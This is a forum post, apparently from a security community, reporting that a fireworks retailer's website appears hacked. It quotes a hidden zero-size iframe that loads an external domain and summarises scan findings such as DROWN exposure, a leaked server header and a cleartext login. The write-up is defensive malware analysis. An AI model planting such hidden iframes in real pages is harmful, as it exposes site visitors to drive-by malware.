Author Topic: Hacked and defaced website with hidden iFrame detected?  (Read 1172 times)

Offline polonus
Hacked and defaced website with hidden iFrame detected?
« on: April 10, 2016, 11:37:44 PM »
See: http://killmalware.com/bigbombfireworks.com/#
iframes
Any iframes? Yes there are.

<iframe width="0" height="0" src="-http://evmjuarez.com/x7ZDuTA-53c&amp;autoplay=1.htm" frameborder="0"></iframe> *
Re: http://toolbar.netcraft.com/site_report?url=http://bigbombfireworks.com
Shun this site as it has very poor rating: https://www.mywot.com/en/scorecard/p3nlhg328c1328.shr.prod.phx3.secureserver.net?utm_source=addon&utm_content=rw-viewsc
GoDaddy abuse: http://toolbar.netcraft.com/site_report?url=http://p3nlhg328c1328.shr.prod.phx3.secureserver.net
and DROWN vulnerable: https://test.drownattack.com/?site=http%3A%2F%2Fp3nlhg328c1328.shr.prod.phx3.secureserver.net%2F

On that iFrame destination * see: https://seomon.com/domain/evmjuarez.com/

Overview
By default, excessive information about the server and frameworks used by a Apache application are returned in the response headers. These headers can be used to help identify security flaws which may exist as a result of the choice of technology exposed in these headers.

Result
The address you entered is unnecessarily exposing the following response headers which divulge its choice of web platform:

Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4

Configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks.

On the external link http://toolbar.netcraft.com/site_report?url=http://up.harajgulf.com
we find insecure log-in http://up.harajgulf.com/do.php?img= (on txt log-in)
Alerts (1)
Insecure login (1)
Password will be transmited in clear to -http://up.harajgulf.com/ucp.php?go=login
Infos (1)
Encryption (HTTPS) (1)
Communication is NOT encrypted

polonus
« Last Edit: April 10, 2016, 11:45:33 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!